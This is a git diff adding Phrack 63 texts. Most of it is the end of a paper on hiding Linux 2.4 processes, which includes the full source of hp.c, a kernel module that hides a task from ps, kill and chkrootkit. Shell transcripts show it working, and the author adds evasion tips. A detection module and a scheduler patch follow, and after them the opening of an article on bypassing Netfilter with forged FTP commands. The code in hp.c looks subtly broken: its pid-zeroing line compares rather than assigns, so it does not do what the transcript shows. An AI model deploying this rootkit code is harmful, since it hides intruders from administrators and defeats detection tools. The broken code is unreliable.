+                p->need_resched = 1;
+		.......
+                if (!TASK_INTERACTIVE(p) || EXPIRED_STARVING(rq)) {
+			.......
+                        enqueue_task(p, rq->expired);
+                } else
+                        enqueue_task(p, rq->active);
+        }
+</codesnip src="kernel/sched.c">
+
+Notice the "need_resched" field of the task struct getting set; now the
+ksoftirqd() task which is a kernel thread will catch this process and call
+schedule()
+
+ [root@absinth root]# ps aux | grep ksoftirqd
+ root     3  0.0  0.0     0    0 ?  SWN  11:45   0:00    [ksoftirqd_CPU0]
+
+<codesnip src="kernel/softirq.c" line=398>
+__init int spawn_ksoftirqd(void)
+{
+        .......
+        for (cpu = 0; cpu < smp_num_cpus; cpu++) {
+                if (kernel_thread(ksoftirqd, (void *) (long) cpu,
+                               CLONE_FS | CLONE_FILES | CLONE_SIGNAL) < 0)
+                     printk("spawn_ksoftirqd() failed for cpu %d\n", cpu);
+                .......
+
+__initcall(spawn_ksoftirqd);
+</codesnip src="kernel/softirq.c">
+
+<codesnip src="kernel/softirq.c" line=361>
+static int ksoftirqd(void * __bind_cpu)
+{
+        .......
+        for (;;) {
+                .......
+                        if (current->need_resched)
+                                schedule();
+                .......
+</codesnip src="kernel/softirq.c">
+
+    And if all this seems bogling to you dont worry, just walk through
+the kernel sources again from the begining and try to understand more than
+im explaining here, no one expects you to understand from the first read
+through such a complicated process like the linux scheduling.. remeber that
+the cookie lies in the details ;-) you can read more about the linux
+scheduler in [7], [8] and [9]
+
+Every cpu has its own runqueue, so apply the same logic for SMP;
+
+    So you can see how a process can be on any number of lists waiting
+for execution, and if its not on the linked task_struct list we`re in big
+trouble trying to find it. The linked and pidhash lists are NOT used by
+the schedule() code to run your program as you saw, some syscalls do use
+these (ptrace, alarm, the timers in general which use signals and all
+calls that use a pid - for the pidhash list)
+
+    Another note to the reader..all example progs from the _attacking_
+section will be anemic modules, no dev/kmem for you since i dont want my
+work to wind up in some lame rk that would only contribute to wrecking the
+net, although kmem counterparts have been developed and tested to work
+fine, and also, with modules we are more portable, and our goal is to
+present working examples that teach and dont krash your kernel; the
+countering section will not have a kmem enabled prog simply because I'm
+lazy and not in the mood to mess with elf relocations (yup to loop the
+list in a reliable way we have to go in kernel with the code)..
+I'll be providing a kernel patch though for those not doing modules.
+
+You should know that if any modules give errors like
+"hp.o: init_module: Device or resource busy
+Hint: insmod errors can be caused by incorrect module parameters,
+including invalid IO or IRQ parameters
+
+    You may find more information in syslog or the output from dmesg"
+when inserting, this is a "feature" (heh) so that you wont have to rmmod
+it, the modules do the job theyre supposed to.
+
+
+--[ 3 - abusing the silence ( attacking )
+
+    If you dont have the IQ of a windoz admin, it should be pretty clear
+to you by now where we are going with this. Oh im sorry i meant to say
+"Windows (TM) admin (TM)" but the insult still goes. Since the linked list
+and pidhash have no use to the scheduler, a program, a task in general
+(kernel threads also) can run happy w/o them. So we remove it from there
+with REMOVE_LINKS/unhash_pid and if youve been a happy hacker looking at
+all of the sources ive listed you know by now what these 2 functions do.
+All that will suffer from this operation is the IPC methods (Inter Process
+Comunications); heh well were invisible why the fuck would we answer if
+someone asks "is someone there ?" :) however since only the linked list is
+used to output in ps and alike we could leave pidhash untouched so that
+kill/ptrace/timers.. will work as usualy. but i dont see why would anyone
+want this as a simple bruteforce of the pid space with kill(pid,0) can
+uncover you.. See pisu program that i made that does just that but using 76
+syscalls besides kill that "leak" pid info from the two list structures. So
+you get the picture, right ?
+
+hp.c is a simple module to hide a task:
+
+ [root@absinth ksched]# gcc -c -I/$LINUXSRC/include src/hp.c -o src/hp.o
+
+
+[Method 1]
+
+Now to show you what happends when we unlink the process from certain
+lists; first from the linked list
+
+ [root@absinth ksched]# ps aux | grep sleep
+ root      1129  0.0  0.5  1848  672 pts/4    S    22:00   0:00 sleep 666
+ root      1131  0.0  0.4  1700  600 pts/2    R    22:00   0:00 grep sleep
+ [root@absinth ksched]# insmod hp.o pid=`pidof sleep` method=1
+ hp.o: init_module: Device or resource busy
+ Hint: insmod errors can be caused by incorrect module parameters,
+ including invalid IO or IRQ parameters
+    You may find more information in syslog or the output from dmesg
+ [root@absinth ksched]# tail -2 /var/log/messages
+ Mar 13 22:02:50 absinth kernel: [HP] address of task struct for pid
+ 1129 is 0xc0f44000
+ Mar 13 22:02:50 absinth kernel: [HP] removing process links
+ [root@absinth ksched]# ps aux | grep sleep
+ root      1140  0.0  0.4  1700  608 pts/2    S    22:03   0:00 grep sleep
+ [root@absinth ksched]# insmod hp.o task=0xc0f44000 method=1
+ hp.o: init_module: Device or resource busy
+ Hint: insmod errors can be caused by incorrect module parameters,
+ including invalid IO or IRQ parameters
+     You may find more information in syslog or the output from dmesg
+ [root@absinth ksched]# tail -1 /var/log/messages
+ Mar 13 22:03:53 absinth kernel: [HP] unhideing task at addr 0xc0f44000
+ Mar 13 22:03:53 absinth kernel: [HP] setting process links
+ [root@absinth ksched]# ps aux | grep sleep
+ root      1129  0.0  0.5  1848  672 pts/4    S    22:00   0:00 sleep 666
+ root      1143  0.0  0.4  1700  608 pts/2    S    22:04   0:00 grep sleep
+ [root@absinth ksched]#
+
+
+[Method 2] (actualy an added enhacement to method 1)
+
+ Point made. Now from the hash list
+
+ [root@absinth ksched]# insmod hp.o pid=`pidof sleep` method=2
+ hp.o: init_module: Device or resource busy
+ Hint: insmod errors can be caused by incorrect module parameters,
+ including invalid IO or IRQ parameters
+ You may find more information in syslog or the output from dmesg
+
+ [root@absinth ksched]# tail -2 /var/log/messages
+ Mar 13 22:07:04 absinth kernel: [HP] address of task struct for pid 1129
+ is 0xc0f44000
+ Mar 13 22:07:04 absinth kernel: [HP] unhashing pid
+ [root@absinth ksched]# insmod hp.o task=0xc0f44000 method=2
+ hp.o: init_module: Device or resource busy
+ Hint: insmod errors can be caused by incorrect module parameters,
+ including invalid IO or IRQ parameters
+       You may find more information in syslog or the output from dmesg
+ [root@absinth ksched]# tail -1 /var/log/messages
+ Mar 13 22:07:18 absinth kernel: [HP] unhideing task at addr 0xc0f44000
+ Mar 13 22:07:18 absinth kernel: [HP] hashing pid
+ [root@absinth ksched]# kill -9 1129
+ [root@absinth ksched]#
+
+So upon removing from the hash list the process also becomes invulnerable
+to kill signals and any other syscalls that use the hash list for that
+matter. This also hides your task from methods of uncovering like
+kill(pid,0) which chkrootkit [10] uses.
+
+* methods 1 and 2 arent that good at hideing shells since most have builtin
+job control and that requires a working find_task_by_pid() and
+for_each_task() (look at sys_setpgid() sources), however, if you know how
+to disable that it works just fine :P ok ill give you a hint, make the
+standard output/input not a terminal.
+
+
+[Method 3]
+
+But this is kids stuff; lets abuse the way the function that generates the
+pid list for the /proc VFS works.
+
+<codesnip src="fs/proc/base.c" line=1057>
+static int get_pid_list(int index, unsigned int *pids)
+{
+        .......
+        for_each_task(p) {
+		.......
+                if (!pid)
+                        continue;
+</codesnip src="fs/proc/base.c">
+
+Have you spoted the not ? :-) cmon its easy, just make our pid 0 and we
+wont get listed (pid 0 tasks are of a special kernel breed and thats why
+they dont get listed there - actualy the kernel itself, the first "task"
+and its cloned children like the swapper); also since we are changing the
+pid but not rehashing the pid position in the hash list all searches for
+pid 0 will go to the wrong hash and all searches for our old pid will
+find a task with a pid of 0, well it will fail each time. An interesting
+side effect of having pid 0 is that the task can call clone() [11] with a
+flag of CLONE_PID, effectively spawning hidden children as well;
+aint that a threat? The old pid can be recovered from tgid member of the
+task_struct since getpid() does it so can we, and moreover this method
+is so safe to do from user space since we arent complicating with
+possible race conditions screwing with the task list pointers. Well safe
+as long as your process doesnt exit as we are just changing its pid..
+
+<codesnip src="kernel/timer.c" line=710>
+asmlinkage long sys_getpid(void)
+{
+	/* This is SMP safe - current->pid doesn't change */
+	return current->tgid;
+}
+</codesnip src="kernel/timer.c">
+
+btw if we change only the pid to 0 there will be no danger that another
+process migth be assigned the same pid we _had_ because in the get_pid()
+func theres a check for tgid also, which we leave untouched and use to
+restore the pid (just read the source for hp.c)
+
+ [root@absinth ksched]# ps aux | grep sleep
+ root      1991  0.2  0.5  1848  672 pts/7    S    19:13   0:00 sleep 666
+ root      1993  0.0  0.4  1700  608 pts/6    S    19:13   0:00 grep sleep
+ [root@absinth ksched]# insmod hp.o pid=`pidof sleep` method=4
+ hp.o: init_module: Device or resource busy
+ Hint: insmod errors can be caused by incorrect module parameters,
+ including invalid IO or IRQ parameters
+       You may find more information in syslog or the output from dmesg
+ [root@absinth ksched]# tail -2 /var/log/messages
+ Mar 16 19:14:07 absinth kernel: [HP] address of task struct for pid 1991
+ is 0xc30f0000
+ Mar 16 19:14:07 absinth kernel: [HP] zerofing pid
+ [root@absinth ksched]# ps aux | grep sleep
+ root      1999  0.0  0.4  1700  600 pts/6    R    19:14   0:00 grep sleep
+ [root@absinth ksched]# kill -9 1991
+ bash: kill: (1991) - No such process
+ [root@absinth ksched]# insmod hp.o task=0xc30f0000 method=4
+ hp.o: init_module: Device or resource busy
+ Hint: insmod errors can be caused by incorrect module parameters,
+ including invalid IO or IRQ parameters
+       You may find more information in syslog or the output from dmesg
+ [root@absinth ksched]# tail -1 /var/log/messages
+ Mar 16 19:14:47 absinth kernel: [HP] unhideing task at addr 0xc0f44000
+ Mar 16 19:14:47 absinth kernel: [HP] reverting zero pid to 1991
+ [root@absinth ksched]# ps aux | grep sleep
+ root      1991  0.0  0.5  1848  672 pts/7    S    19:13   0:00 sleep 666
+ [root@absinth ksched]#
+
+    See how cool is this? I might say that all this article is about is
+zerofing pids in task_structs :-)
+(and you only have to change 2 bytes at most to hide a process !)
+
+* your task should never call exit when having pid 0 or it will suck from
+do_exit which is called by sys_exit
+
+<codesnip src="kernel/exit.c" line=480>
+NORET_TYPE void do_exit(long code)
+{
+        .......
+        if (!tsk->pid)
+                panic("Attempted to kill the idle task!");
+<codesnip src="kernel/exit.c">
+
+That is if you hide your shell like this be sure to unhide it (set its pid
+to something) before you `exit`.. or , dont mind me and exit the whole
+system hehe. In a compromised environment do_exit could have that
+particular part overwritten with nops (no operation instruction - an
+asm op code that does nothing).
+
+You can use for the method field when insmoding hp.o any combination of the
+3 bit flags presented
+
+
+
+--[ 4 - can you scream ? ( countering)
+
+    Should you scream? Well, yes. Detecting the first method can be a
+waiting game or at best, a hide and seek pain-in-the-ass inside all the
+waiting queues around the kernel, while holding the big lock. But no, its
+not imposible to find a hidden process even if it could mean running a rt
+task that will take over the cpu(s) and binary search the kmem device.
+This could be done as a brute force for certain magic numbers inside the
+task struct whithin the memory range one could get allocated and look if
+its valid with something like testing its virtual memory structures but
+this has the potential to be very unreliable (and ..hard).
+
+Finding tasks that are hiden this way is a pain as no other structure
+contains a single tasks list so that in a smooth soop we could itterate and
+see what is not inside the linked list and pidhash and if there would be we
+wouldve probably removed out task from there too hehe. If you think by now
+this will be the ultimate kiddie-method, hope no more, were smart people,
+for every problem we release the cure also. So there is a ..way :) .. a
+clever way exploiting what every process desires, the need to run ;-} *evil
+grin*
+
+This method can take a while however, if a process blocks on some call like
+listen() since we only catch them when they _run_ while being _hidden_.
+
+	Other checks could verify the integrity of the linked list, like the
+order in the list and the time stamps or something (know that ptrace() [12]
+fucks with this order).
+
+    To backdoor switch_to (more exactly __switch_to, remember the first
+is a define) is a bit tricky from a module, however ive done it but it
+doesnt seem very portable so instead, from a module, we hook the syscall
+gate thus exploiting the *need to call* of programs :-), which is very
+easy, and every program in order to run usefuly has to call some syscalls,
+right?
+
+But so that you know, to trap into schedule() from a module (or from kmem
+for that matter) we find the address of __switch_to(). We could do this
+two ways, either do some pattern matching for calls inside schedule() or
+notice that sys_fork() is right after __switch_to() and do some math.
+After that just insert a hook at the end of __switch_to (doing it before
+__switch_to would make our code execute in unsafe environment - krash -
+since its a partialy switched environment).
+
+So this is what the module does, the kernel patch, sh.patch uses the
+mentioned need to run of processes by inserting a call inside the
+schedule() function which was described earlier and checks the structs
+against the current process.
+
+    So how do we deal with _real_ pid 0 tasks, that we dont catch them
+as being rogues? Remember what ive said about the pid 0 tasks being a
+special breed, they are kernel threads in effect so we can differentiate
+them from normal user land processes because they have no allocated memory
+struct / no userland memory dooh! / and no connected binary format struct
+for that matter (a special case would be when one would have its evil task
+as a mangled kernel thread but i guess we could tell even then by name or
+the number of active kernel threads if its an evil one).
+
+Anyway for an example with the *need ro call* method.. For this we launch a
+bash session so that we can _put it on the run queue_ by writing some
+command on it.. like i said, we catch these tasks only when they do
+syscalls
+
+ [root@absinth ksched]# gcc -c -I/$LINUXSRC/include src/sht.c -o src/sht.o
+ [root@absinth ksched]# insmod sht.o
+ [root@absinth ksched]# insmod hp.o pid=`pidof hidden_bash` method=1
+ hp.o: init_module: Device or resource busy
+ Hint: insmod errors can be caused by incorrect module parameters,
+ including invalid IO or IRQ parameters
+       You may find more information in syslog or the output from dmesg
+ ( now we type some command in the hidden bash session to make it run )
+ [root@absinth root]# tail /var/log/messages
+ .......
+ Jul  8 19:43:26 absinth kernel: [SHT] task pid 562 <bash> task addr
+ 0xc72f0000 syscall 175 - TASK IS HIDDEN ( NOT ON LINKED LIST / on pidhash
+ list / pid is valid )
+ Jul  8 19:43:26 absinth kernel: [SHT] task pid 562 <bash> task addr
+ 0xc72f0000 syscall 3 - TASK IS HIDDEN ( NOT ON LINKED LIST / on pidhash
+ list / pid is valid )
+ [root@absinth ksched]# rmmod sht
+
+Voila. It works.. it also looks for unhashed or pid 0 tasks; the only
+problem atm is the big output which ill sort out with some list hashed by
+the task address/pid/processor/start_time so that we only get 1 warning
+per hidden process :-/
+
+To use the kernel patch instead of the module change to the top of your
+linux source tree and apply it with `patch -p0 < sh.patch` (if you have a
+layout like /usr/src/linux/, cd into /usr/src/). The patch is for the
+2.4.30 branch (although it migth work with other 2.4 kernels; if you need
+it for other kernel versions check with me) and it works just like the
+module just that it hooks directly into the schedule() function and so can
+catch sooner any hidden tasks.
+
+    Now if some of you are thinking at this point why make public
+research like this when its most likely to get abused, my answer is
+simple, dont be an ignorant, if i have found most of this things on my own
+I dont have any reason to believe others havent and its most likely to
+already been used in the wild, maybe not that widespead but lacking the
+right tools to peek in the kernel memory, we would never know if and how
+used it is already. So shut your suck hole .. the only ppl hurting from
+this are the underground hackers, but then again they are brigth people
+and other more leet methods are ahead :-) just think about hideing a task
+inside another task (sshutup ubra !! lol no peeking)
+.. you will read about it probably in another small article
+
+
+--[ 5 - references
+
+ [1] manual pages for ps(1) , top(1) , pstree(1) and the proc(5) interface
+     http://linux.com.hk/PenguinWeb/manpage.jsp?section=1&name=ps
+     http://linux.com.hk/PenguinWeb/manpage.jsp?section=1&name=top
+     http://linux.com.hk/PenguinWeb/manpage.jsp?section=1&name=pstree
+     http://linux.com.hk/PenguinWeb/manpage.jsp?section=5&name=proc
+
+ [2] LRK - Linux Root Kit
+     by Lord Somer <webmaster@lordsomer.com>
+     http://packetstormsecurity.org/UNIX/penetration/rootkits/lrk5.src.tar.gz
+
+ [3] LKM HACKING
+     by pragmatic from THC
+     http://reactor-core.org/linux-kernel-hacking.html
+
+ [4] Syscall redirection without modifying the syscall table
+     by Silvio Cesare <silvio@big.net.au>
+     http://www.big.net.au/~silvio/stealth-syscall.txt
+     http://spitzner.org/winwoes/mtx/articles/syscall.htm
+
+ [5] Phrack 59/0x04 - Handling the Interrupt Descriptor Table
+     by kad <kadamyse@altern.org>
+     http://www.phrack.org/show.php?p=59&a=4
+
+ [6] Phrack 61/0x0e - Kernel Rootkit Experiences
+     by stealth <stealth@segfault.net>
+     http://www.phrack.org/show.php?p=61&a=14
+
+ [7] Linux kernel internals #Process and Interrupt Management
+     by Tigran Aivazian <tigran@veritas.com>
+     http://www.tldp.org/LDP/lki/lki.html
+
+ [8] Scheduling in UNIX and Linux
+     by moz <moz@compsoc.man.ac.uk>
+     http://www.kernelnewbies.org/documents/schedule/
+
+ [9] KernelAnalysis-HOWTO #Linux Multitasking
+     by Roberto Arcomano <berto@fatamorgana.com>
+     http://www.tldp.org/HOWTO/KernelAnalysis-HOWTO.html
+
+ [10] chkrootkit - CHecK ROOT KIT
+      by Nelson Murilo <nelson@pangeia.com.br>
+      http://www.chkrootkit.org/
+
+ [11] manual page for clone(2)
+      http://linux.com.hk/PenguinWeb/manpage.jsp?section=2&name=clone
+
+ [12] manual page for ptrace(2)
+      http://linux.com.hk/PenguinWeb/manpage.jsp?section=2&name=ptrace
+
+
+
+--[ 6 - and the game dont stop..
+
+    Hei fukers! octavian, trog, slider, raven and everyone else I keep
+close with, thanks for being there and wasteing time with me, sometimes I
+really need that ; ruffus , nirolf and vadim wtf lets get the old team on
+again .. bafta pe oriunde sunteti dudes.
+
+    If you notice any typos, mistakes, have anything to communicate with
+me feel free make contact.
+
+ web  - w3.phi.group.eu.org
+ mail - ubra_phi.group.eu.org
+ irc  - Efnet/Undernet #PHI
+
+* the contact info and web site is and will not be valid/up for a few
+weeks while im moving house, sorry ill get things settled ASAP ( that
+is up until about august of 2005 ), meanwhile you can get in touch
+with me on the email dragosg_personal.ro
+
+
+--[ 7 - sources
+
+<++> src/Makefile
+
+all: sht.c hp.c
+	gcc -c -I/EDIT_HERE_YOUR_LINUX_SOURCE_TREE/linux/include sht.c hp.c
+
+
+
+<-->
+
+
+
+<++> src/hp.c
+/*|
+ *	hp - hide pid v1.0.0
+ *	 hides a pid using different methods
+ *	 ( demo code for hideing processes paper )
+ *
+ *	syntax : insmod hp.o (pid=pid_no|task=task_addr) [method=0x1|0x2|0x4]
+ *
+ *	coded in 2004 by ubra from PHI Group
+ *	 web  - ubra.phi.group.za.org
+ *	 mail - ubra_phi.group.za.org
+ *	 irc  - Efnet/Undernet#PHI
+|*/
+
+
+
+#define __KERNEL__
+#define MODULE
+
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/sched.h>
+
+
+
+pid_t pid = 0 ;
+struct task_struct *task = 0 ;
+unsigned char method = 0x3 ;
+
+
+
+int init_module ( ) {
+	if ( pid ) {
+		task = find_task_by_pid(pid) ;
+		printk ( "[HP] address of task struct for pid %i is 0x%p\n" , pid , task ) ;
+		if ( task ) {
+			write_lock_irq(&tasklist_lock) ;
+			if ( method & 0x1 ) {
+				printk("[HP] removing process links\n") ;
+				REMOVE_LINKS(task) ;
+			}
+			if ( method & 0x2 ) {
+				printk("[HP] unhashing pid\n") ;
+				unhash_pid(task) ;
+			}
+			if ( method & 0x4 ) {
+				printk("[HP] zerofing pid\n") ;
+				task->pid == 0 ;
+			}
+			write_unlock_irq(&tasklist_lock) ;
+		}
+	} else if ( task ) {
+		printk ( "[HP] unhideing task at addr 0x%x\n" , task ) ;
+		write_lock_irq(&tasklist_lock) ;
+		if ( method & 0x1 ) {
+			printk("[HP] setting process links\n") ;
+			SET_LINKS(task) ;
+		}
+		if ( method & 0x2 ) {
+			printk("[HP] hashing pid\n") ;
+			hash_pid(task) ;
+		}
+		if ( method & 0x4 ) {
+			printk ( "[HP] reverting 0 pid to %i\n" , task->tgid ) ;
+			task->pid = task->tgid ;
+		}
+		write_unlock_irq(&tasklist_lock) ;
+	}
+	return 1 ;
+}
+
+
+
+
+MODULE_PARM ( pid , "i" ) ;
+MODULE_PARM_DESC ( pid , "the pid to hide" ) ;
+
+MODULE_PARM ( task , "l" ) ;
+MODULE_PARM_DESC ( task , "the address of the task struct to unhide" ) ;
+
+MODULE_PARM ( method , "b" ) ;
+MODULE_PARM_DESC ( method , "a bitwise OR of the method to use , 0x1 - linked list , 0x2 - pidhash , 0x4 - zerofy pid" ) ;
+
+
+MODULE_AUTHOR("ubra @ PHI Group") ;
+MODULE_DESCRIPTION("hp - hide pid v1.0.0 - hides a task with 3 possible methods") ;
+MODULE_LICENSE("GPL") ;
+EXPORT_NO_SYMBOLS ;
+
+
+
+<-->
+
+
+
+<++> src/sht.c
+/*|
+ *	sht - search hidden tasks v1.0.0
+ *	 checks tasks to be visible upon entering syscall
+ *	 ( demo code for hideing processes paper )
+ *
+ *	syntax : insmod sht.o
+ *
+ *	coded in 2005 by ubra from PHI Group
+ *	 web  - w3.phi.group.za.org
+ *	 mail - ubra_phi.group.za.org
+ *	 irc  - Efnet/Undernet#PHI
+|*/
+
+
+
+#define __KERNEL__
+#define MODULE
+
+
+#include <linux/kernel.h>
+#include <linux/module.h>
+#include <linux/sched.h>
+
+
+
+struct idta {
+        unsigned short size ;
+        unsigned long addr __attribute__((packed)) ;
+} ;
+
+
+struct idt {
+        unsigned short offl ;
+        unsigned short seg ;
+        unsigned char pad ;
+        unsigned char flags ;
+        unsigned short offh ;
+} ;
+
+
+
+unsigned long get_idt_addr ( void ) {
+	struct idta idta ;
+
+	asm ( "sidt %0" : "=m" (idta) ) ;
+	return idta.addr ;
+}
+
+
+
+unsigned long get_int_addr ( unsigned int intp ) {
+	struct idt idt ;
+	unsigned long idt_addr ;
+
+	idt_addr = get_idt_addr() ;
+	idt = *((struct idt *) idt_addr + intp) ;
+	return idt.offh << 16 | idt.offl ;
+}
+
+
+
+void hook_int ( unsigned int intp , unsigned long new_func , unsigned long *old_func ) {
+	struct idt idt ;
+	unsigned long idt_addr ;
+
+	if ( old_func )
+		*old_func = get_int_addr(intp) ;
+	idt_addr = get_idt_addr() ;
+	idt = *((struct idt *) idt_addr + intp) ;
+	idt.offh = (unsigned short) (new_func >> 16 & 0xFFFF) ;
+	idt.offl = (unsigned short) (new_func & 0xFFFF) ;
+	*((struct idt *) idt_addr + intp) = idt ;
+	return ;
+}
+
+
+
+asmlinkage void check_task ( struct pt_regs *regs , struct task_struct *task ) ;
+asmlinkage void stub_func ( void ) ;
+
+unsigned long new_handler = (unsigned long) &check_task ;
+unsigned long old_handler ;
+
+
+
+void stub_handler ( void ) {
+	asm(".globl stub_func			\n"
+	    ".align 4,0x90			\n"
+	    "stub_func :			\n"
+	    "	pushal				\n"
+	    "	pushl	%%eax			\n"
+	    "	movl	$-8192 , %%eax		\n"
+	    "	andl	%%esp , %%eax		\n"
+	    "	pushl	%%eax			\n"
+	    "	movl	-4(%%esp) , %%eax	\n"
+	    "	pushl	%%esp			\n"
+	    "	call	*%0			\n"
+	    "	addl	$12 , %%esp		\n"
+	    "	popal				\n"
+	    "	jmp	*%1			\n"
+	    :: "m" (new_handler) , "m" (old_handler) ) ;
+}
+
+
+
+asmlinkage void check_task ( struct pt_regs *regs , struct task_struct *task ) {
+	struct task_struct *task_p = &init_task ;
+	unsigned char on_ll = 0 , on_ph = 0 ;
+
+	if ( ! task->mm )
+		return ;
+	do {
+		if ( task_p == task ) {
+			on_ll = 1 ;
+			break ;
+		}
+		task_p = task_p->next_task ;
+	} while ( task_p != &init_task ) ;
+	if ( find_task_by_pid(task->pid) == task )
+		on_ph = 1 ;
+	if ( ! on_ll || ! on_ph || ! task->pid )
+		printk ( "[SHT] task pid %i <%s> task addr 0x%x syscall %i - TASK IS HIDDEN ( %s / %s / %s )\n" , task->pid , task->comm , task , regs->orig_eax , on_ll ? "on linked list" : "NOT ON LINKED LIST" , on_ph ? "on pidhash list" : "NOT ON PIDHASH LIST" , task->pid ? "pid is valid" : "PID IS INVALID" ) ;
+	return ;
+}
+
+
+
+int sht_init ( void ) {
+	hook_int ( 128 , (unsigned long) &stub_func , &old_handler ) ;
+	printk("[SHT] loaded - monitoring tasks integrity\n") ;
+	return 0 ;
+}
+
+
+
+void sht_exit ( void ) {
+	hook_int ( 128 , old_handler , NULL ) ;
+	printk("[SHT] unloaded\n") ;
+	return ;
+}
+
+
+
+module_init(sht_init) ;
+module_exit(sht_exit) ;
+
+
+
+
+MODULE_AUTHOR("ubra / PHI Group") ;
+MODULE_DESCRIPTION("sht - search hidden tasks v1.0.0") ;
+MODULE_LICENSE("GPL") ;
+EXPORT_NO_SYMBOLS ;
+
+
+<-->
+
+
+
+<++> src/sh.patch
+--- linux-2.4.30/kernel/sched_orig.c	2004-11-17 11:54:22.000000000 +0000
++++ linux-2.4.30/kernel/sched.c	2005-07-08 13:29:16.000000000 +0000
+@@ -534,6 +534,25 @@
+ 	__schedule_tail(prev);
+ }
+ 
++asmlinkage void phi_sht_check_task(struct task_struct *prev, struct task_struct *next)
++{
++	struct task_struct *task_p = &init_task;
++	unsigned char on_ll = 0, on_ph = 0;
++
++	do {
++		if(task_p == prev) {
++			on_ll = 1;
++			break;
++		}
++		task_p = task_p->next_task ;
++	} while(task_p != &init_task);
++	if (find_task_by_pid(prev->pid) == prev)
++		on_ph = 1 ;
++	if (!on_ll || !on_ph || !prev->pid)
++		printk("[SHT] task pid %i <%s> task addr 0x%x ( next task pid %i <%s> next task addr 0x%x ) - TASK IS HIDDEN ( %s / %s / %s )\n", prev->pid, prev->comm, prev, next->pid, next->comm, next, on_ll ? "on linked list" : "NOT ON LINKED LIST", on_ph ? "on pidhash list" : "NOT ON PIDHASH LIST", prev->pid ? "pid is valid" : "PID IS INVALID");
++	return;
++}
++
+ /*
+  *  'schedule()' is the scheduler function. It's a very simple and nice
+  * scheduler: it's not perfect, but certainly works for most things.
+@@ -634,6 +653,13 @@
+ 	task_set_cpu(next, this_cpu);
+ 	spin_unlock_irq(&runqueue_lock);
+ 
++	/*
++	 * check task`s structures before we do any scheduling decision
++	 * skip any kernel thread which might yeld false positives
++	 */
++	if(prev->mm)
++		phi_sht_check_task(prev, next);
++
+ 	if (unlikely(prev == next)) {
+ 		/* We won't go through the normal tail, so do this by hand */
+ 		prev->policy &= ~SCHED_YIELD;
+<-->
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
+
diff --git a/phrack63/19.txt b/phrack63/19.txt
new file mode 100644
index 0000000..c393dcd
--- /dev/null
+++ b/phrack63/19.txt
@@ -0,0 +1,853 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x13 of 0x14
+
+|=------=[ Breaking through a Firewall using a forged FTP command ]=-----=|
+|=-----------------------------------------------------------------------=|
+|=-------------=[ Soungjoo Han <kotkrye@hanmail.net> ]=------------------=|
+
+
+Table of Contents
+
+  1 - Introduction
+  2 - FTP, IRC and the stateful inspection of Netfilter
+  3 - Attack Scenario I
+    3.1 - First Trick
+    3.2 - First Trick Details
+  4 - Attack Scenario II - Non-standard command line
+    4.1 - Second Trick Details
+  5 - Attack Scenario III - 'echo' feature of FTP reply
+    5.1 - Passive FTP: background information
+    5.2 - Third Trick Details
+  6 - APPENDIX I. A demonstration tool of the second trick
+  7 - APPENDIX II. A demonstration example of the second attack trick.
+
+
+--[ 1 - Introduction
+
+    FTP is a protocol that uses two connections. One of them is called a
+control connection and the other, a data connection. FTP commands and
+replies are exchanged across the control connection that lasts during an
+FTP session. On the other hand, a file(or a list of files) is sent across
+the data connection, which is newly established each time a file is
+transferred.
+
+    Most firewalls do not usually allow any connections except FTP control
+connections to an FTP server port(TCP port 21 by default) for network
+security. However, as long as a file is transferred, they accept the data
+connection temporarily. To do this, a firewall tracks the control
+connection state and detects the command related to file transfer. This is
+called stateful inspection.
+
+    I've created three attack tricks that make a firewall allow an illegal
+connection by deceiving its connection tracking using a forged FTP command.
+
+    I actually tested them in Netfilter/IPTables, which is a firewall
+installed by default in the Linux kernel 2.4 and 2.6. I confirmed the first
+trick worked in the Linux kernel 2.4.18 and the second one(a variant of the
+first one) worked well in the Linux 2.4.28(a recent version of the Linux
+kernel).
+
+    This vulnerability was already reported to the Netfilter project team
+and they fixed it in the Linux kernel 2.6.11.
+
+
+--[ 2 - FTP, IRC and the stateful inspection of Netfilter
+
+    First, let's examine FTP, IRC(You will later know why IRC is mentioned)
+and the stateful inspection of Netfilter. If you are a master of them, you
+can skip this chapter.
+
+    As stated before, FTP uses a control connection in order to exchange
+the commands and replies(, which are represented in ASCII) and, on the
+contrary, uses a data connection for file transfer.
+
+    For instance, when you command "ls" or "get <a file name>" at FTP
+prompt, the FTP server(in active mode) actively initiates a data connection
+to a TCP port number(called a data port) on the FTP client, your host. The
+client, in advance, sends the data port number using a PORT command, one of
+FTP commands.
+
+The format of a PORT command is as follows.
+
+                     PORT<space>h1,h2,h3,h4,p1,p2<CRLF>
+
+    Here the character string "h1,h2,h3,h4" means the dotted-decimal IP
+"h1.h2.h3.h4" which belongs to the client. And the string "p1,p2" indicates
+a data port number(= p1 * 256 + p2). Each field of the address and port
+number is in decimal number. A data port is dynamically assigned by a
+client. In addition, the commands and replies end with <CRLF> character
+sequence.
+
+    Netfilter tracks an FTP control connection and gets the TCP sequence
+number and the data length of a packet containing an FTP command line
+(which ends with <LF>). And then it computes the sequence number of the
+next command packet based on the information. When a packet with the
+sequence number is arrived, Netfilter analyzes whether the data of the
+packet contains an FTP command. If the head of the data is the same as
+"PORT" and the data ends with <CRLF>, then Netfilter considers it as a
+valid PORT command (the actual codes are a bit more complicated) and
+extracts an IP address and a port number from it. Afterwards, Netfilter
+"expects" the server to actively initiate a data connection to the
+specified port number on the client. When the data connection request is
+actually arrived, it accepts the connection only while it is established.
+In the case of an incomplete command which is called a "partial" command,
+it is dropped for an accurate tracking.
+
+    IRC (Internet Relay Chat) is an Internet chatting protocol. An IRC
+client can use a direct connection in order to speak with another client.
+When a client logs on the server, he/she connects to an IRC server
+(TCP port 6667 by default). On the other hand, when the client wants to
+communicate with another, he/she establishes a direct connection to the
+peer. To do this, the client sends a message called a DCC CHAT command in
+advance. The command is analogous to an FTP PORT command. And Netfilter
+tracks IRC connections as well. It expects and accepts a direct chatting
+connection.
+
+
+--[ 3 - Attack Scenario I
+
+----[ 3.1 - First Trick
+
+    I have created a way to connect illegally to any TCP port on an FTP
+server that Netfilter protects by deceiving the connection-tracking module
+in the Linux kernel 2.4.18.
+
+    In most cases, IPTables administrators make stateful packet filtering
+rule(s) in order to accept some Internet services such as IRC direct
+chatting and FTP file transfer. To do this, the administrators usually
+insert the following rule into the IPTables rule list.
+
+    iptables -A FORWARD -m state --state ESTABLISHED, RELATED -j ACCEPT
+
